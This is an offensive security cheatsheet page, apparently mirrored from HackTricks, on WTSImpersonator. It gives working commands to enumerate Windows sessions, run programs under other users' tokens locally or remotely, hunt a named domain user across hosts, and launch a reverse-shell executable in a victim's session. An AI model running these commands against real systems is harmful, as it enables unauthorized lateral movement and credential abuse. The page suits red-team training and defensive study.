daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

wts-impersonator.md (2747B)


      1 ---
      2 title: "WTS Impersonator"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/stealing-credentials/wts-impersonator.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/stealing-credentials/wts-impersonator.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # WTS Impersonator
     14 
     15 **WTSImpersonator**, by Omri Baso, uses Windows Terminal Services APIs exposed through the `\\pipe\LSM_API_service` RPC named pipe to enumerate logged-on sessions and start a process with a selected user's token. It supports local enumeration and execution as well as remote service-based workflows.<sup>[[1]](#references)</sup>
     16 
     17 ## Core functionality
     18 
     19 Its local execution flow uses the following API sequence:<sup>[[1]](#references)[[2]](#references)</sup>
     20 
     21 ```text
     22 WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
     23 ```
     24 
     25 ## Modules and usage
     26 
     27 - **Enumerate users:** The tool can enumerate sessions on the local or a remote host.
     28 
     29   - Locally:
     30     ```bash
     31     .\WTSImpersonator.exe -m enum
     32     ```
     33   - Remotely, specify an IP address or hostname:
     34     ```bash
     35     .\WTSImpersonator.exe -m enum -s 192.168.40.131
     36     ```
     37 
     38 - **Execute commands:** The `exec` and `exec-remote` modules need a service context. Microsoft documents that `WTSQueryUserToken` requires the caller to run as `LocalSystem` with the `SE_TCB_NAME` privilege.<sup>[[2]](#references)</sup>
     39 
     40   - Local command execution:
     41     ```bash
     42     .\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
     43     ```
     44   - PsExec can start a `LocalSystem` command prompt for testing:
     45     ```bash
     46     .\PsExec64.exe -accepteula -s cmd.exe
     47     ```
     48 
     49 - **Remote command execution:** The remote mode creates a service on the target in a PsExec-like workflow and therefore requires rights to install and start that service.<sup>[[1]](#references)</sup>
     50 
     51   - Example:
     52     ```bash
     53     .\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
     54     ```
     55 
     56 - **User hunting:** The `user-hunter` module searches a host list for a named user's session and attempts to execute the supplied program in that context.<sup>[[1]](#references)</sup>
     57   - Usage example:
     58     ```bash
     59     .\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
     60     ```
     61 
     62 ## References
     63 
     64 - [1] [OmriBaso/WTSImpersonator](https://github.com/OmriBaso/WTSImpersonator)
     65 - [2] [Microsoft: `WTSQueryUserToken` function](https://learn.microsoft.com/en-us/windows/win32/api/wtsapi32/nf-wtsapi32-wtsqueryusertoken)